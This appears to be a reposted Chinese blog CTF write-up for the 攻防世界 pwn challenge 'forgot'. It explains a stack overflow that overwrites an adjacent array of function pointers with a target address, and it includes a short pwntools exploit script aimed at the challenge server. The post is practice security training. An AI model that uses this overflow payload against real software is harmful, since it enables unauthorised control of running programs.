攻防世界(Pwn) forgot---栈溢出；(方法二) - 代码天地

攻防世界(Pwn) forgot---栈溢出；(方法二)

其他 2021-03-06 00:10:09 阅读次数: 0

攻防世界(Pwn) forgot—栈溢出；(方法一) 里面对问题描述的更详细一点

返回目标函数

在这里插入图片描述 0x80486CC

方法二(爆破流)

在这里插入图片描述因为最终返回的是 v3[0]-v3[9] 之中的一个函数,

v3[--v5] v5的值随着for循环会发生改变

v2输入是溢出点

在这里插入图片描述
v2,v3两组数据在栈上是相邻的, v2的长度大于 20h之后就会覆盖v3的返回值了

干脆把v3[0]-v3[9]函数全部改为目标函数的地址就可以了:0x80486CC

此时无论v5等于什么,我们都会得到目标 flag

EXP

from pwn import  *
io = remote('111.200.241.244', 59837)
payload = 'H'*0x20 + p32(0x80486cc)*10
io.sendlineafter(">","hhh")
io.sendlineafter(">",payload)
io.interactive()

有问题欢迎留言❄

猜你喜欢

转载自blog.csdn.net/weixin_45556441/article/details/114291427

攻防世界(Pwn) forgot---栈溢出；(方法二)

攻防世界PWN题 forgot

6.pwn入门新手做攻防世界 forgot栈内变量溢出

PWN-整型溢出-攻防世界-PWN-int_overflow

攻防世界forgot

攻防世界(pwn)--Mary_Morton 利用格式化字符串+栈溢出破解Canary的保护机制

攻防世界 pwn welpwn

攻防世界 pwn string

攻防世界—pwn—hello_pwn

攻防世界PWN题 pwn-100

攻防世界 pwn100&&pwn200

攻防世界-PWN-hello_pwn

攻防世界(Pwn) PWN100

攻防世界 | hello_pwn

攻防世界 pwn-200

[攻防世界]pwn1

攻防世界--hello_pwn

攻防世界PWN题 string

攻防世界 Pwn 新手

CTF(pwn)攻防世界warmup

攻防世界 CTF Pwn（一）

攻防世界pwn之新手区

攻防世界pwn-Mary_Morton

攻防世界 pwn1 wp

攻防世界_pwn_getshell(萌新版)

攻防世界XCTF新手区pwn

攻防世界pwn新手区writeup

攻防世界—pwn—level0

攻防世界—pwn—guess_num

攻防世界—pwn—cgpwn2

今日推荐

周排行

阿里云服务器ECS开放8080端口

求正弦和余弦

链表倒数第n个节点

vue.js入门（13）实战demo

Java学习——day 15

My First Day in CSDN

Oracle11g 密码延迟认证导致library cache lock的情况分析

SAP ALV输出字段内容前增加空格

CloudFlare 推出免费 VPN 服务「Warp」，你懂的！

BUG(跑SLAM14-ch10)

每日归档

更多

2025-03-16(0)

2025-03-15(0)

2025-03-14(0)

2025-03-13(0)

2025-03-12(0)

2025-03-11(0)

2025-03-10(0)

2025-03-09(0)

2025-03-08(0)

2025-03-07(0)